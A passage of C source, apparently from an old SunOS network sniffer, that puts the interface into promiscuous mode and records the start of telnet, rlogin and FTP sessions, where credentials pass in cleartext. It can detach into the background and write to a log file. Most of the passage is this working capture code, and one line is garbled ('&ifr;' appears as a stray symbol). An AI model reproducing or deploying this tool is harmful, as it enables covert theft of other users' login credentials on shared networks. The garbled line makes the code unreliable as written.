| if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ | |
| return; | |
| tcph = (struct tcphdr *)(Packet + IPHLEN); | |
| if(!( (TCPD == IPPORT_TELNET) || | |
| (TCPD == IPPORT_LOGINSERVER) || | |
| (TCPD == IPPORT_FTP) | |
| )) return; | |
| { register struct CREC *CLm; | |
| register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); | |
| register u_char *p = (u_char *)Packet; | |
| p += ((IPHLEN * 4) + (TCPOFF * 4)); | |
| if(debug) { | |
| fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); | |
| fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); | |
| fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); | |
| } | |
| if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { | |
| CLm->PKcnt++; | |
| if(length>0) | |
| if( (CLm->Length + length) < MAXBUFLEN ) { | |
| ADDDATA_NODE( CLm, p,length); | |
| } else { | |
| END_NODE( CLm, p,length, "DATA LIMIT"); | |
| } | |
| if(TCPFL(TH_FIN|TH_RST)) { | |
| END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); | |
| } | |
| } else { | |
| if(TCPFL(TH_SYN)) { | |
| ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); | |
| } | |
| } | |
| IDLE_NODE(); | |
| } | |
| } | |
| /* signal handler | |
| */ | |
| void death() | |
| { register struct CREC *CLe; | |
| while(CLe=CLroot) | |
| END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); | |
| fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); | |
| fflush(LOG); | |
| if(LOG != stdout) | |
| fclose(LOG); | |
| exit(1); | |
| } | |
| /* opens network interface, performs ioctls and reads from it, | |
| * passing data to filter function | |
| */ | |
| void do_it() | |
| { | |
| int cc; | |
| char *buf; | |
| u_short sp_ts_len; | |
| if(!(buf=malloc(CHUNKSIZE))) | |
| Pexit(1,"Eth: malloc"); | |
| /* this /dev/nit initialization code pinched from etherfind */ | |
| { | |
| struct strioctl si; | |
| struct ifreq ifr; | |
| struct timeval timeout; | |
| u_int chunksize = CHUNKSIZE; | |
| u_long if_flags = NI_PROMISC; | |
| if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) | |
| Pexit(1,"Eth: nit open"); | |
| if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) | |
| Pexit(1,"Eth: ioctl (I_SRDOPT)"); | |
| si.ic_timout = INFTIM; | |
| if(ioctl(if_fd, I_PUSH, "nbuf") < 0) | |
| Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); | |
| timeout.tv_sec = 1; | |
| timeout.tv_usec = 0; | |
| si.ic_cmd = NIOCSTIME; | |
| si.ic_len = sizeof(timeout); | |
| si.ic_dp = (char *)&timeout; | |
| if(ioctl(if_fd, I_STR, (char *)&si) < 0) | |
| Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); | |
| si.ic_cmd = NIOCSCHUNK; | |
| si.ic_len = sizeof(chunksize); | |
| si.ic_dp = (char *)&chunksize; | |
| if(ioctl(if_fd, I_STR, (char *)&si) < 0) | |
| Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); | |
| strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); | |
| ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; | |
| si.ic_cmd = NIOCBIND; | |
| si.ic_len = sizeof(ifr); | |
| si.ic_dp = (char *)𝔦 | |
| if(ioctl(if_fd, I_STR, (char *)&si) < 0) | |
| Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); | |
| si.ic_cmd = NIOCSFLAGS; | |
| si.ic_len = sizeof(if_flags); | |
| si.ic_dp = (char *)&if_flags; | |
| if(ioctl(if_fd, I_STR, (char *)&si) < 0) | |
| Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); | |
| if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) | |
| Pexit(1,"Eth: ioctl (I_FLUSH)"); | |
| } | |
| while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { | |
| register char *bp = buf, | |
| *bufstop = (buf + cc); | |
| while (bp < bufstop) { | |
| register char *cp = bp; | |
| register struct nit_bufhdr *hdrp; | |
| hdrp = (struct nit_bufhdr *)cp; | |
| cp += sizeof(struct nit_bufhdr); | |
| bp += hdrp->nhb_totlen; | |
| filter(cp, (u_long)hdrp->nhb_msglen); | |
| } | |
| } | |
| Pexit((-1),"Eth: read"); | |
| } | |
| /* Authorize your proogie,generate your own password and uncomment here */ | |
| /* #define AUTHPASSWD "EloiZgZejWyms" */ | |
| void getauth() | |
| { char *buf,*getpass(),*crypt(); | |
| char pwd[21],prmpt[81]; | |
| strcpy(pwd,AUTHPASSWD); | |
| sprintf(prmpt,"(%s)UP? ",ProgName); | |
| buf=getpass(prmpt); | |
| if(strcmp(pwd,crypt(buf,pwd))) | |
| exit(1); | |
| } | |
| */ | |
| void main(argc, argv) | |
| int argc; | |
| char **argv; | |
| { | |
| char cbuf[BUFSIZ]; | |
| struct ifconf ifc; | |
| int s, | |
| ac=1, | |
| backg=0; | |
| ProgName=argv[0]; | |
| /* getauth(); */ | |
| LOG=NULL; | |
| device=NULL; | |
| while((ac<argc) && (argv[ac][0] == '-')) { | |
| register char ch = argv[ac++][1]; | |
| switch(toupper(ch)) { | |
| case 'I': device=argv[ac++]; | |
| break; | |
| case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a"))) | |
| Zexit(1,"Output file cant be opened\n"); | |
| break; | |
| case 'B': backg=1; | |
| break; | |
| case 'D': debug=1; | |
| break; | |
| default : fprintf(ERR, | |
| "Usage: %s [-b] [-d] [-i interface] [-f file]\n", | |
| ProgName); | |
| exit(1); | |
| } | |
| } | |
| if(!device) { | |
| if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) | |
| Pexit(1,"Eth: socket"); | |
| ifc.ifc_len = sizeof(cbuf); | |
| ifc.ifc_buf = cbuf; | |
| if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0) | |
| Pexit(1,"Eth: ioctl"); | |
| close(s); | |
| device = ifc.ifc_req->ifr_name; | |
| } | |
| fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); | |
| fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", | |
| (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); | |
| if(!LOG) | |
| LOG=stdout; | |
| signal(SIGINT, death); | |
| signal(SIGTERM,death); | |
| signal(SIGKILL,death); | |
| signal(SIGQUIT,death); | |
| if(backg && debug) { | |
| fprintf(ERR,"[Cannot bg with debug on]\n"); | |
| backg=0; | |
| } | |
| if(backg) { | |
| register int s; | |
| if((s=fork())>0) { | |
| fprintf(ERR,"[pid %d]\n",s); | |
| exit(0); | |
| } else if(s<0) | |
| Pexit(1,"fork"); | |
| if( (s=open("/dev/tty",O_RDWR))>0 ) { | |
| ioctl(s,TIOCNOTTY,(char *)NULL); | |
| close(s); | |
| } | |
| } | |
| fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); | |
| fflush(LOG); | |
| do_it(); | |
| } | |